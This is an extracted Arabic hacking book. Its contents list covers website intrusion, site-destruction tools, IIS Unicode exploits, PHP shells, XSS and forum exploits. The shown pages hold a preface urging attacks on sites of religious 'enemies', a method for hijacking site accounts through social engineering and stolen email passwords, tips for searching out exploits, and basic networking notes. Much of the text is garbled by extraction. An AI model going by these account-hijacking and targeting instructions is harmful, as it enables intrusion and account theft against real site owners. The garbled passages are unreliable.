30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

330
ويات لمحت1 . قدمة. الم2 . الفهرس.3 . لهاكر.مة عن ا مقدمة عا4 . رنت.بحث في النت كيفية ال5 . .(ولجزء الال) رنت النتشبكاتفاهيم خاصة ب م6 . .(لثانيالجزء ا) رنت النتشبكاتفاهيم خاصة ب م7 . رنت. عبر النت المن8 . لشبكات. أمن ا9 . المواقع.ن في اختراقلمبتدئيهمة ل مصطلحات م10 . لمبتدئين. المواقع ل اختراق11 . برنامج . الختراق بWebcrack 12 . برنامج . الختراق بMungaBunga 13 . ير المواقع برنامج تدمWinSmurf . 14 . شرح برنامجEvil Ping ير المواقع. لتدم15 . ير المواقع.مج الدرة لتدم برنا16 . اقع بدون برامج.ير المو تدم17 . لنت. الت18 . لومات عن معDNS . 19 . لومات عن معRouting in the Internet . 1 . NETBIOS . 2 . توكول خدمة بروFinger . 3 . Net المر.كة بإستخدامدارة الشب شرح مختصر ل4 . شرح الـ.secure shell 5 . شرح معنى الـ .Buffer Overflows 6 . الـCGI رنت.قتها بالنت وعل7 . ي أفعالك؟!. تحمي نفسك وتخف كيف8 . ؟؟.(ولجزء الال) ة في النت الهوي كيف تبقى مجهول9 . ؟؟.(لثانيالجزء ا) ة في النت الهوي كيف تبقى مجهول10 . برنامجHTTP Port .! ! متخفياصفح النتت يجعلك ت الذي11 . برنامج . شرحNeoTrace 20 . قع أو شبكة.لومات عن مو المع بجمعلقيام كيفية ا21 . عن الثغرات.لبحثن سكان لج عمرا برنام22 . .(ولجزء الال) ق اليونيكود الختراق عن طري23 . .(لثانيالجزء ا) ق اليونيكود الختراق عن طري24 . ثغرات اليونيكود.لستفادة منمة عن كيفية الومات عا مع25 . لختراق سيرفركامل اليل الدلIIS . 26 . ة وبعمق في الـ . دراسة مفصلUniCode 27 . ختراق بواسطة اليونيكود.ية ال تدريب على عمل28 . لمجانية. المواقع ا لكيفية اختراق شرح مفصل29 . وكيز. عن الك درس مفصل30 . مج السطورة شرح برناGod Will لصفحات. تلغيم ا في31 . برنامجا بة ومرحبمج السطورلبرنا ا ل وداعNOOP4 . 32 . دعم الفرونت بيج.ي تن المواقع التهمة ع معلومات م33 . دعم الفرونت بيج.ي ت المواقع الت اختراق34 . ختراق العشوائي. ال35 . المواقع.مثلى في اختراققة الصحيحة وال الطري36 . المواقع. ومبسطة عن كيفية اختراقسيرة نبذه ي37 . لمبتدئين. المواقع ل في اختراق(<س;pma&ج>) 1

description

بلبل

Transcript of 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Page 1: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لمحتوياتالمقدمة..1الفهرس..2مقدمة عامة عن الهاكر..3كيفية البحث في النترنت..4مفاهيم خاصة بشبكات النترنت (الجزء الول)..5مفاهيم خاصة بشبكات النترنت (الجزء الثاني)..6المن عبر النترنت..7أمن الشبكات..8مصطلحات مهمة للمبتدئين في اختراق المواقع..9

اختراق المواقع للمبتدئين..10Webcrackالختراق ببرنامج ..11MungaBungaالختراق ببرنامج ..12.WinSmurfبرنامج تدمير المواقع .13 لتدمير المواقع.Evil Pingشرح برنامج .14برنامج الدرة لتدمير المواقع..15تدمير المواقع بدون برامج..16التلنت..17.DNSمعلومات عن .18.Routing in the Internetمعلومات عن .19

1.NETBIOS..Fingerبروتوكول خدمة .23.Net.شرح مختصر لدارة الشبكة بإستخدام المر secure shellشرح الـ..4Buffer Overflowsشرح معنى الـ ..5 وعلقتها بالنترنت.CGIالـ.6كيف تحمي نفسك وتخفي أفعالك؟!..7كيف تبقى مجهول الهوية في النت (الجزء الول)؟؟..8كيف تبقى مجهول الهوية في النت (الجزء الثاني)؟؟. .9 الذي يجعلك تتصفح النت متخفيا!!.HTTP Portبرنامج .10 NeoTraceشرح برنامج ..11

كيفية القيام بجمع المعلومات عن موقع أو شبكة..20برنامج عمران سكان للبحث عن الثغرات..21الختراق عن طريق اليونيكود (الجزء الول)..22الختراق عن طريق اليونيكود (الجزء الثاني)..23معلومات عامة عن كيفية الستفادة من ثغرات اليونيكود..24.IISالدليل الكامل لختراق سيرفر .25 UniCodeدراسة مفصلة وبعمق في الـ ..26تدريب على عملية الختراق بواسطة اليونيكود..27شرح مفصل لكيفية اختراق المواقع المجانية..28درس مفصل عن الكوكيز..29في تلغيم الصفحات.God Willشرح برنامج السطورة .30.NOOP4وداعا للبرنامج السطورة ومرحبا ببرنامج .31معلومات مهمة عن المواقع التي تدعم الفرونت بيج..32اختراق المواقع التي تدعم الفرونت بيج..33الختراق العشوائي..34الطريقة الصحيحة والمثلى في اختراق المواقع..35نبذه يسيرة ومبسطة عن كيفية اختراق المواقع..36(<س&ج>) في اختراق المواقع للمبتدئين..37

1

Page 2: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

للبحث عن الثغرات.CgiScanerبرنامج .38شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع..39 لتحليل الموقع.Shadow Scan Securityشرح برنامج .40اماكن وجود ملف الباسورد في أنظمة التشغيل..41اختراق الموقع (الجزء الول)..42اختراق المواقع (الجزء الثاني)..43اختراق المواقع (الجزء الثالث)..44درس في اختراق المواقع (متوسط)..45.htaccessشرح ملف .46FTPنظام نقل الملفات ..47FTPالختراق عن طريق ..48.SQLاختراق الـ.49SQLدرس مفصل عن الـ..50درس لحتراف الهاك في اختراق المواقع..51استغلل لينكس في اختراق المواقع..52درس اخر في اختراق المواقع عن طريق لينكس..53شرح مفصل من اللف إلى الياء في احتراف اختراق المواقع عن طريق لينكس..54 (الجزء الول).PHP Shellدرس عن الـ.55 (الجزء الثاني).PHP Shellدرس عن الـ.56 (الجزء الثالث).PHP Shellدرس عن الـ.57.anmapشرح أداة .58طريقة لقتحام السيرفرات بدون ثغرات..5960.Cross Site Scripting.كود تدمير سجل الزوار..61وضع فايروس في صفحة..62الثغرااات..63شرح شبه مفصل عن الثغرات..64كيف تستخدم الثغرات..65تمتع بإختراق المواقع السرائيلية مع هذه الثغرة..66ثغرة نيوك..67.Chunkedثغرة .68حماية المنتديات..69.vBulletin2,2,0اختراق المنتديات من نوع .70درس مفصل عن كيفية اختراق المنتديات وطرق حمايتها..71.vBulletin 2,2,9ثغرة في منتديات.72.phpbb 2.0.0اختراق منتديات .73 .php nukeثغرة في .74أفضل المنتديات والمواقع العربية للهاك..75أفضل مواقع المن والهاك النجليزية..76الخاتمة..77

2

Page 3: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

بسم الله الرحمن الرحيم

الحمد لله رب العالمين الرحمن الرحيم والصلة والسلم على أشرفالنبياء

والمرسلين نبينا محمد عليه أفضل الصلة وأتم التسليم،أما بعد...

ارجوا من العلي القدير أن يوفقني في كتابة هذا الكتاب الذي سيكون

ا لخواني وأخواتي المسلمين، ففي هذا الكتاب سأقوم بنقل كل ما مرجع

كتب في اختراق المواقع وتدميرها عن أخواني المسلمين من كيفية

الختراق بالبرامج وبغيرها للمواقع المعادية لديننا الحنيف،،،

وارجوا من القراء الدعاء في ظهر الغيب لجامع هذا الكتاب.

ل عن اخواني ملحظة: مواضيع هذا الكتاب ليس من تأليفي إنما هي نق

المسلمين.

ل قبل البدء بقراءة مواضيع هذا الكتاب"اقسم بالله العلي اقرأ هذا اوالعظيم

الذي رفع السماء بل عمد أل اقوم بتطبيق ما في هذا الكتاب من طرق

على مواقع اخواني المسلمين وأن انفعهم قدر ما استطيع"

والله الموفق،،،

3

Page 4: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"من هم الهاكر"

اشخاص مخترقون لجهزة الغير بمساعدة احدى برامج الختراق المشهورة إعتماد على برامج الهكرز هم. الحاسبين تسمى بالباتش اوالسيرفر مساندة تسهل عملية التصال بين

-كيف يتم اختراق مواقع النترنت؟؟

هذا السؤال الذي دفع الكثيرين الي البحث والبحار في عالم النتهناك انواع من الصفحات والسرفرات التي توفر مواقع مجانية

النوع الول

سيرفرات تحتفظ ببياناتك واذا نسيت او لم تتذكر باسوورد موقعك فانها سوف تطلب منك بياناتك الشخصية السرية التي ل يعلمها ال انت مثل

اسمك الحقيقي الكاملعمرك وميلدك من اي بلد انت

وتختلف الدقة من سيرفر الي سيرفر آخرالنوع الثاني

سيرفرات تحتفظ ببياناتك واذا اضعت الباسوورد او نسيته فانها تطلب منك فقط الضغط علي ايكون مكتوب عليه

((نسيت الباسوورد))ومن ثم يرسلون الباسوورد الي اليميل الخاص بك

................................................................... هذا النوع يسهل اختراقه اذا عرفت بيانات الشخص واستطعت التحدث معه بشتي الطرق وباسلوب لبق وما

ان تعرف بياناته الشخصية حتي يمكنك ان تذهب الي صفحته الخاصه والضغط علي ايكون انك نسيت الباسوورد وادخال

البايانات الخاصة ... ومن ثم تغيير الباسوورد

وتغيير بيانات صاحب الصفحة الخاصة والسرية..........................

النوع الثاني

هذا النوع مهما حاولت سرقة الباسوورد فانك لتستطيع ان تمتلك الصفحة لمدة طويلة لن الشركة سوف ترسل اليه الباسوورد

.. الجديد .. ومن هنا سيعرف الباسوورد ورقمه الجديد!!! وسيتم اعادة ملكيته الي الصفحة او الموقع مره أخري

)) اذا كيف الحل ؟؟ .. الحل هو

ان تعرف باسوورد اليميل الخاص به وحين تعرف الباسوورد سيمكنك الذهاب الي الشركة وكتابة انك نسيتالباسوورد للموقع

.. فسيتم اخطارك علي اليميل الذي سرقته .. بالباسوورد للموقع.ومن هنا يمكنك سرقتة وملكيته وانت بسلم

،،،انتهى

4

Page 5: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"كيفية البحث في النترنت"

<ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة>

< ةةةةةة: ةةةة ةةةة>

كيفية البحث في النترنت ؟عندما نسمع عن برنامج ما او عن مشكلة ما او اي شيء في النترنت ونريد البحث عنها كيف يتم ذلك ؟؟

غالبا نجد ان الشباب ل يقدر ان يقوم بالبحث في منتدى فما بالك بمسئله تريد البحث عنها في النترنت ؟ وقدتجده يبحث ولكن ل يحصل بنتيجه والخطأ ليس في البحث

بل في طريقة البحث

صنعت محركات البحث حتى تساعدك في الوصول الى ما تريد باقصر وقت ممكن ولكن عليك ان تعلم انمحركات البحث لكل منها عمل مع العلم انها عامه ولكن

ما هي النتائج ؟؟

بالنسبه مثل للجوجل انا اعتبره المحرك الذكي فهو يعرف ماذا كتبت فلذلك يعطيك النتائج الولى وهي غالباالتي تريدها

بالنسبه للياهو هو ايضا ذكي ولكن ذكائه تجاري بحت حيث انه يقدم لك المواقع التجاريه التي تقدم ما تريدوالتي يتعامل معها المحرك ثم المواقع التجاريه التي ل يتعامل

معها المحرك ثم المواقع العامه وهي ما ترده انت احيانا

اعتقد ان المسئله وضحت

يا اخوان انا ابغى ابحث عن برنامج ما مثل يجب علي ان اخطط للبحث قبل ان اذهب الى المنتديات واسئل لزم انت تتعلم كيف تبحث

وش الفرق بينك وبين النسان اللي هيجيبلك المعلومه من المنتدى ؟ هل يملك ريشه على دماغه ؟؟؟ ل اعتقدذلك

هل النترنت لديه سريعه للغايه وانت بطئيه للغايه ؟ ايضا ل اعتقد ذلك مع العلم ان السرعات العاليه اثبتتفشلها بالنسبه لبعض الشخاص

التي ل تعرف كيف توظف عقولها

كنت مره في حديث مع صديق لي بدوله عربيه في الخليج وكان يحدثني بصراحه ويقول لي وال يا اخ بلكانا الن لي سنه كامله على النترنت

ول اعرف من برامج الختراق غير الهاك اتاك256غير محدد بباندويث وبسرعة ISDN مع خط

فعل انا تحطمت سنه كامله ومعك القوه الضاربه هذه ول تعرف غير الهاك اتاك ؟ قلتلله انت اكيد وقتك ما بينمواقع الغاني والفلم والداون لود لها والشات قال ايوال هذا هو انا

وبذلك فعل ايقنت ان السرعه ليست كل شيء

.اهم شي عقلية من يملك السرعه فالسلح الذي ل تستطيع استخدامه - ل ينفع :) - ا هـ

: الن سنقوم بشرح كيفية التخطيط للبحث

طريقه بسيطه جدا وهي عبر تقسيم المواقع

مواقع تجاريه

5

Page 6: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

(( مواقع برامج (( ويندوز - ليونكسمواقع ملتيميديا

مواقع سياسيه واخباريهمواقع هاك

مواقع كراكمواقع سكيوريتي

مواقع هاردويرمنتديات

(( محرك بحث جوجل (( هذا لوحده عالممواقع ..... الخ

الن لنأخذ ما نبحث عنه

مثل برنامج ؟ بسيطه جدا ؟ وش يخليني اروح ابحث مثل في الياهو ؟؟؟ وش يخليني ابحث بمحرك عام ؟؟؟؟او حتى وش يخليني اروح ابحث بالقوقل ؟؟؟

خلص بما انه برنامج انطلق فورا الى مواقع البرامج امثال زد دي نت - ويب اتاك - داون لود - وغيرهاوبالنسبه لليونكس فهناك موقع انا اعتبره انه اقوى من موقع داون لود في برامجه للويندوز

(( وهو موقع فريش ميت (( اخر الموضوع ساضع كل تلك المواقع كمرجع

بعد ان بحثت ولم اجد البرنامج ماذا افعل ؟ هل انتهى العمل ؟ ل لم ينتهي بعد اذهب الى الجوجل وابحث عنما تريد وابدا بقرائه النوتس الذي يخبرك ماذا تحوي هذه الصفحه

واذا وجدت ما تريد ادخل اليها

لم تجد ؟؟ (( ما اعتقد انك ما هتلقي اللي تدور عليه انا عمري ما سويت هالطريقه ال واجد ما اريد )) ولكنلنفرض انك لم تجد ؟ ماذا ستفعل ؟ اذهب الى المنتديات وابحث

قبل ان تسأل واذالم تجد وقتها بامكانك السوال بالمنتدى

هذه نقطه نقطة اخرى مثل انت منت عارف اللي انت تبحث عنه بالظبط

مثل انا ادور على ثغره عارف نوعها ولكن ماني عارف موجوده في وشCSS او XSS واللي اختصارها Cross Site Scripte ولتكن مثل ثغرات الـ

انا ما ادور على الثغره ادور على اكسبلويت مثل وش اسوي ؟؟؟ هيطلعللك كل شي عنها ابدا ابحث فيما تريد وفي نفس XSS اذهب اول لمواقع السكيوريتي ابحث عن كلمة

الوقت اذهب الى الجوجل مثل وابحث عنXSS ولكن هذا ل يكفي انا ابغى شي بعينه والجوجل مو زي مواقع السكيوريتي هتجيب شي بسيط ل

( + ) الجوجل هيجيب بلوي ولذلك علي بتحديد البحث عبر علمه

: يعني انا ادور بجز وادور اكسبلويت وادور باسم الثغره فعلي ان اكتبXSS+BUG+EXPLOIT: هاكتب IIS مثل ادور ثغرات

IIS+exploit+bug

خليه يطلعللك كل شي عن المسئله اللي تبحث عنها اهم شي انه يجيبلك مواضيع في ما تبحث عنه

ومن ثم المنتديات ومن ثم الكتابه عن ما تريد اذا لم تجد

اهم شي بالنقطه التخطيط للبحث

عن ماذا ابحث ؟ موضوع يتعلق ببرنامج ؟ ويندوز وال ليونكس ؟ رتب المواقع : ابدا البحثعن ماذا ابحث ؟ موضوع يتعلق بالشوبرينج ؟ رتب المواقع : ابدا البحث

6

Page 7: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

وهكذا

الن ساضع لكم مجموعه من المواقع تفيدكم جدا

/http://www.google.com : الملك جوجل

/http://www.yahoo.com/ - http://www.altavista.com : محركات بحث عاديه ومتقدمه- http://www.lycos.com/ - http://hotbot.lycos.com/

- kazaa (( مواقع ملتيميديا : (( عبر برامجها مثثل الكازا او المورفيس او اوديو جالكسي او وين ام اسWinMX الكثر شهره

- http://news.bbc.co.uk/hi/arabic/news : مواقع سياسيه واخباريهhttp://arabic.cnn.com/ - http://www.aljazeera.net/

- /http://www.securiteam.com : مواقع سكيوريتيhttp://www.securityfocus.com/ - http://www.ussrback.com/ -

http://www.ntbugtraq.com/ - http://www.ntsecurity.nu/ - http://www.ntsecurity.com/

-http://nvidia.com/ - http://www.asus.com/ - http://drivers.on : مواقع هاردويرline.net.nz/ - http://intel.com/ - http://www.amdmb.com/

،،،انتهى

7

Page 8: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"(مفاهيم خاصة بشبكات النترنت (الجزء الول"

<ةةةةة>

< ةةةةةة: ةةةة ةةةةةة>

النترنت عالم مليء بالفائدة، مليء بالمتعة، عالم يجد فيه كل إنسان ما يهمه، باختلف مجالت الهتمام واختلف الشخاص. ولكن على الرغم من كثرة الشياء المفيدة في النترنت إل أنه لبد من وجود ما يكدر

الصفو. هذا الكدر نسميه "الهاكرز" أو من يسمون بالمخترقين في بعض الحيان. من هم الهاكرز ؟ وما هي أهدافهم ؟ وكيف نتقي شرهم ؟ أسئلة ل بد أنها دارت في رأس أكثر المستخدمين في مختلف أنحاء العالم، ول سيما أولئك المستخدمين الذين طالهم أذى الهاكرز سواء بسرقة معلومات من

أجهزتهم أو إتلف محتوياتها أو في أهون الحوال إخافتهم وإرعابهم. الهاكر الطيب سلسلة من الحلقات نقدمها لك أخي القارئ، كوسيلة تعليمية لكل المستخدمين على مختلف

مستوياتهم لكي يتعلموا كيف يتقون شرور هؤلء الهاكرز ولكي يعرفوا الحيل التي يستخدمها الهاكرز للحاق الذى بهم. باختصار ستكون أخي القارئ أحد هؤلء الهاكرز، ولكن لن تكون مثلهم في الشر..بل ستكون

الهاكر الطيب.

مقدمة: هذه الحلقة ستكون مخصصة لتقديم بعض المهارات والمعلومات الساسية التي يجب أن يعرفها كل من يريد

اتقاء شر الهاكرز، وهي بعض المصطلحات والمفاهيم الخاصة شبكات الحاسب اللي.

IPرقم ما الغرض من بطاقة الحوال المدنية التي تحملها ؟ انها مجرد وسيلة لتمييزك وتعريفك. فالرقم الموجود على

بطاقتك يستحيل تكراره لي مواطن آخر في نفس البلد. نفس المبدأ ينطبق في مجال الحاسب اللي من ناحية الشبكات، فلتمييز الجهزة المرتبطة بشبكة واحدة يعطى

لكل جهاز رقم مميز يستحيل تكراره في أي جهاز آخر مرتبط بنفس الشبكة وهذا الرقم هو ما يسمى بعنوان.IPالجهاز أو

في حالة الشبكات الدائمة والتي يكون الجهاز مرتبطا بالشبكة بواسطة أسلك الشبكة، يكون هذا الرقم ثابتا للجهاز دائما. مالم يتم نزع الجهاز من الشبكة بشكل دائم، ولكن في حالة التصال الهاتفي فإن عنوان الجهاز

يتغير كلما اتصلت على موفر الخدمة الذي تدخل للشبكة من خلله. لعلك الن تتساءل كيف أعرف عنوان جهازي عندما أتصل بالنترنت؟ المر سهل جدا من شريط المهام في

. إذا كنت تستخدم وندوز باعتماد اللغة العربية اخترwinipcfg ثم أدخل run ثم Startالوندوز انقر على .winipcfg"ابدأ" ثم "تشغيل" ثم اكتب

IPتوزيع أرقام الـ ، وهل سبق24.5.66.3 وليس 212.33.40.1 الخاص بك هو IPهل سبق وأن تساءلت لماذا كان رقم

وليس بأي رقم آخر ؟ في الحقيقة إن أرقام212 في السعودية بالرقم IPوأنت تساءلت لماذا تبدأ ارقام الـIPليتم توزيعها بطريقة عشوائية أو بطريقة "كل يأخذ ما يريد" بل بالعكس يوجد هناك منظمات تشرف

الذيIP على الدول والمؤسسات داخل الدول بحيث يتم معرفة الجهة عند معرفة رقم IPعلى توزيع أرقام تمتلكه.

علىIP) على توزيع أرقام IANA(Internet Assigned Numbers Authorityتشرف منظمة مستوى العالم، حيث أنها تقوم بالشراف على ثلث منظمات فرعية وتكون كل منظمة مسؤولة عن جزء

معين من العالم وهذه المنظمات الفرعية هي: ) وتشرف على أمريكاARIN (American Registry for Internet Numbers- منظمة 1

الشمالية والجنوبية والمناطق الكاريبية وأجزاء من افريقيا ) وتشرف على منطقة أوروبا والشرق الوسط وأجزاءRIPE (Réseaux IP Européens- منظمة 2

من افريقيا) وتشرف على آسياAPNIC (Asia Pasific Network Information Center- منظمة 3

للدول الواقعة تحت مجال اشرافها. ويوجد لكل منظمة قاعدةIPتقوم كل منظمة بالشراف على توزيع ارقام

8

Page 9: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

IP حيث تقوم بإدخال رقم whois معين وتسمى هذه الخدمة بخدمة IPبيانات تمكنك من معرفة صاحب رقم معين فيIP فمثل لمعرفة صاحب رقم IPالتابع لمنظمة معينة وستحصل على معلومات عن من يمتلك هذا

وأدخل رقمhttp://www.ripe.net/db/whois.htmlالمملكة العربية السعودية قم بالذهاب للموقع IP.وستحصل على معلومات متكاملة عن صاحب هذا الرقم

IPعائلة الـ كل قسم من هذه القسام يمكن أن10.10.10.1 يتكون من أربعة أقسام كالتالي IPمن المعروف أن رقم الـ

(مع وجود بعض الستثناءات التي ليس هذا المجال لذكرها) الشيء255 و 0تكون له قيمة تتراوح بين غالبا ما تكون محجوزة لمزود خدمةIPالذي يجب معرفته أن أول ثلثة أقسام من الجهة اليسرى من رقم

التي يتشابه بها أول ثلثة أقسام من الجهة اليسرى تنتمي لنفس مزودIPمعين بحيث تكون جميع أرقام ال IP والجهاز الذي يحمل رقم IP 212.26.75.34الخدمة. فمثل الجهاز الذي يحمل رقم

غالبا ما ينتميان لنفس مزود الخدمة.212.26.75.201 بدون آخر رقم من الجهة اليمنى ) يمكنك زيارةIP الثلثي (أي رقم IPولمعرفة مزود الخدمة بواسطة رقم

الخاصة بها. فمثل،whois واستخدام خدمة IPموقع المنظمة المشرفة على البلد الذي ينتمي له رقم http://www.ripe.net/db/whois.htmlلمعرفة مزود الخدمة في المثال أعله قم بالذهاب للموقع

وستحصل علىsearch في المربع الموجود في الصفحة ومن ثم انقر الزر 212.26.75وأدخل الرقم جميع المعلومات المخزنة عن مزود الخدمة.

Portالمنفذ ماهو المنفذ ؟ تخيل منزل فيه العديد من البواب وأن كل واحد من هذه البواب مخصص لخدمة معينة ، فباب لستقبال الضيوف وباب آخر للخدم وباب آخر لدخول الخدمات.نفس المبدأ ينطبق على الحاسب اللي فالجهاز

وغيرها.ftp server وخادم الملفات web serverيحتوي على العديد من الخدمات مثل خادم الويب فكل تطبيق لديه منفذ معين يستخدمه لرسال واستقبال بياناته وهذا نوع من التنظيم فمثل خدمة الويب غالبا

وبرنامج النت ميتنغ يكون على عدة منافذ21 وخدمة الملفات تكون على المنفذ 80ما تكون على المنفذ وكل تطبيق يكون له منفذ معين. فبالتالي عندما تأتي بيانات للجهاز على منفذ معين فسوف1720منها

يعرف الجهاز لي تطبيق تنتمي هذه البيانات ويقوم بإرسالها لهذا التطبيق الذي يقوم بمعالجتها.

DNSماهو ؟ أنت بالطبع تتذكر أسماء أصدقائك ول تواجه أي مشكلة في استرجاعها من ذاكرتك ولكن ماذا عن أرقام

9

Page 10: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هواتفهم ؟كم رقما تحفظ منها ؟ اثنان ؟ عشرة؟ مهما كانت ذاكرتك جيدة فلن تستطيع حفظ أرقام هواتفهم كلها وإن فعلت فتبقى الحقيقة أن نسيان الرقام أكثر سهولة من نسيان السماء. من هذا المبدأ جاءت فكرة

DNSحيث أنه في بداية استخدام النترنت كان من المفروض أن تحفظ عنوان الجهاز .IP.. لكل موقع ومن ثم لحظwww.cnn.com بدل من 207.145.53.10 يجب أن تكتب CNNفمثل لزيارة موقع

خبراء الحاسب أن ذلك سيكون صعبا جدا .. فالذاكرة البشرية غير قادرة على حفظ الكثير من الرقام ومن هنا IP وهو عبارة عن جهاز خادم يحفظ معلومات هي عبارة عن أسماء الجهزة وأرقام DNSتم التوجه للـ

IP ليرد عليهم بعنوانه (رقم DNSالخاصة بها حيث يقوم المستخدمون بإرسال اسم الموقع الى مزود يكفي ان تكتبها في المستعرض الذي سيقوم بإرسالهاwww.cnn.comالخاص به) فلتدخل على موقع

والذي سيقوم بتحويلها الى عنوان الجهازحتى يستطيع جهازك التخاطب مع خادمDNSلخادم السماء ماهو ال جهاز يحتويDNSالويب الخاص بشبكة سي ان ان... اختصارا، يمكن القول بأن خادم السماء

الخاصة بها.IPعلى قاعدة بيانات فيها اسماء الجهزة في النترنت وأرقام

netstatالمر هل تعلم بأنه من المستحيل أن يكون هناك تخاطب بين جهازك وبين أي جهاز آخر في النترنت بدون أن

الخاص بالجهاز الخر؟ وأقصد بالتخاطب هو نقل أي نوع من البيانات.IPيكون لدى كل من الجهازين رقم الـ هذا شيء ضروري فلكي ترسل رسالة إلى شخص معين فيجب أن تعرف عنوانه ويجب هو أيضا أن يعرف

عنوانك لكي يقوم بالرد عليك. بالطبع هناك عدة استثناءات سنتحدث عنها في وقتها. في نظام الشبكات يسمى . طبعا لكل اتصال يجب أن يكون هناك من يقوم بطلب التصالconnectionهذا التخاطب بالتصال

.server ويكون هناك أيضا من يتم التصال عليه ويسمى مزود Clientويسمى عميل أو هناك أمر في نظام الدوس يسمح لك بمعرفة جميع الجهزة المتصلة بجهازك ( أو التي يقوم جهازك بارسال

) الذي تم عليه التصال( فائدة المنفذ هي تحديد التطبيق الذيportواستقبال البيانات منها) ومعرفة المتفذ ( منms-dos prompt ما عليك إل أن تقوم بتشغيل netstatتم التصال عليه) وهذا المر هو المر

ومن ثم اكتب هذا المر وستحصل على قائمة بكل هذه الجهزة مع المنفذ الذي تمprogramsقائمة برامج عليه التصال في كل الجهازين.

IRC) Internet Relay Chatالمحادثة ( chat client ووجود برنامج محادثة chat serverطريقة عمل نظام المحادثة هي وجود مزود محادثة

في كل جهاز بحيث إذا أراد شخص الدخول للمحادثة يقوم بتشغيل برنامج المحادثة ، والذي بدوره يقوم بالتصال بمزود المحادثة. وبعد إجراء التصال يتمكن الشخص من الدخول لي من الغرف الموجودة في

المزود كما يمكنه أيضا انشاء الغرف الخاصة به، كما يمكنه أيضا القيام بالعديد من الوظائف التي ليس هذاالمجال لذكرها.

الخاص بك، ولكن يجب أن ل يفهمIPقلنا في السابق أن كل جهاز يقوم جهازك بالتخاطب معه يعرف رقم الـ chat تقوم أنت بالتصال بمزود المحادثة IRCهذا الكلم بالشكل الخاطيء فمثل في نظام المحادثة

serverوكذلك الحال بالنسبة لجميع المستخدمين، بحيث يكون هذا المزود كالوسيط بينك وبين جميع الشخاص المتصلين به، فلكي تقوم بإرسال رسالة لشخص ما، يقوم برنامج المحادثة بإرسال الرسالة لمزود

المحادثة والذي بدوره يقوم بإرسالها للشخص وبالتالي فإنه ل يوجد اتصال مباشر بينك وبين أي شخص آخر للشخاص الخرين ناقصاIPخلل نظام المحادثة، ولها تلحظ أن برامج المحادثة غالبا ما تعطيك رقم

) وهذا فيه نوع من الحماية للمستخدمين حتى ل يتمكن الهاكرز منXXX.111.222.333(بالشكل التالي الكاملIPمعرفة رقم الـ

للمستخدم ومن ثماستخدامه للوصول إليه.

هناك استثناءان لهذا النظام، حيث يمكن لي

شخص آخر في نظام IPالمحادثة معرفة رقم

الكامل الخاص بك, وهماكالتالي:

. في حالة كون الشخص1 مشرفا على الغرفة التي

10

Page 11: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

دخلت بها (المشرف هو الشخص الذي أنشأ الغرفة أو الشخص الذي تم منحه الصلحية من قبل من أنشأ الكامل لكل شخص دخل غرفته.IPالغرفة)، حيث أن المشرف يحصل على رقم الـ

. في حالة تبادلك الملفات مع شخص في نظام المحادثة: فمزود المحادثة يقوم بدور الوسيط في نقل2 الخاص بالجهاز الخرIPالنصوص فقط، أما في حالة نقل الملفات فإنه يقوم بإعطاء كل الجهازين رقم الـ

بحيث يقومان بنقل البيانات بينهما بشكل مباشر. مما ذكر أعله، احذر من الدخول للغرف التي تكون مخصصة للهاكرز، حيث أنه المشرف (وهو هاكر في

الخاص بك مباشرة مما يعرض جهازك لخطر الختراق. وأيضا احذر منIPالغالب) سيحصل على رقم استقبال الملفات ممن ل تعرفهم أو ممن يعرض عليك إرسال الملفات بدون سبب، لن غرضه الوحيد ربما

يكون الحصول على رقم الي بي الخاص بك.

من صاحب الموقع ؟ لبد أنك قد زرت موقعا وأعجبك، وتساءلت في نفسك من هو صاحب هذا الموقع (سواء كان شخصا أو

مؤسسة) ل داعي لن تحتار بعد الن فيكفي أن تذهب للموقعwww.networksolutions.com/cgi-bin/whois/whoisوتقوم بإدخال اسم الموقع من دون /

www مثل ) wagait.comوستحصل على اسم الشخص الذي قام بتسجيل الموقع وعنوانه البريدي( ورقم هاتفه والفاكس وغيرها من المعلومات الخرى المتعلقة بالموقع. بالطبع فهذه المعلومات قد قام صاحب

الموقع بإدخالها عندما قام بحجز اسم الموقع.

قائمة ببعض المنافذ والتطبيقات المقابلة لها

التطبيق المقابل المنفذ التطبيق المقابل المنفذ 21 FTP 31337 تروجانBackOrifice

ارسال بريد الكتروني 25SMTP

Netmeetingبرنامج 1720,1503

11

Page 12: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Chatالمحادثة Web 6667ويب 80 استقبال بريد الكتروني 110

POP3 NetBusتروجان 12345,20034

مشاركة ملفات في 139ويندوز

انتهى،،،

12

Page 13: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"مفاهيم خاصة بشبكات النترنت (الجزء الثاني)"

لكي تعرف كيف تحمي نفسك من أي خطر يجب أول أن تعرف ما هو هذا الخطر ومن ثم يصبح بإمكانك أن تعرف كيف تحمي نفسك من هذا الخطر، فمثل لكي نحمي أنفسنا من اللصوص، يجب أن نعرف خطرهم. ومن

ثم يجب أن نعرف كيف نتقي شرهم، فنحن نقفل البواب لمعرفتنا أن اللصوص قد يدخلون منها في حال تركناها مفتوحة. كذلك هو الحال بالنسبة للحاسب اللي، فلكي تعرف كيف تحمي نفسك من شرور الهاكرز،

يجب أن تعرف كيف يقومون باختراق جهازك، وما هي البواب التي يدخلون منها إلى أجهزتنا.

في الحلقة السابقة تكلمنا عن بعض مصطلحات ومفاهيم الشبكات، والتي تساعدك على معرفة ما سنتحدث عنه في هذه الحلقة وهي الطرق والبرامج التي تمكن المخترقين (الهاكرز) من القيام بعملية الختراق لجهزة

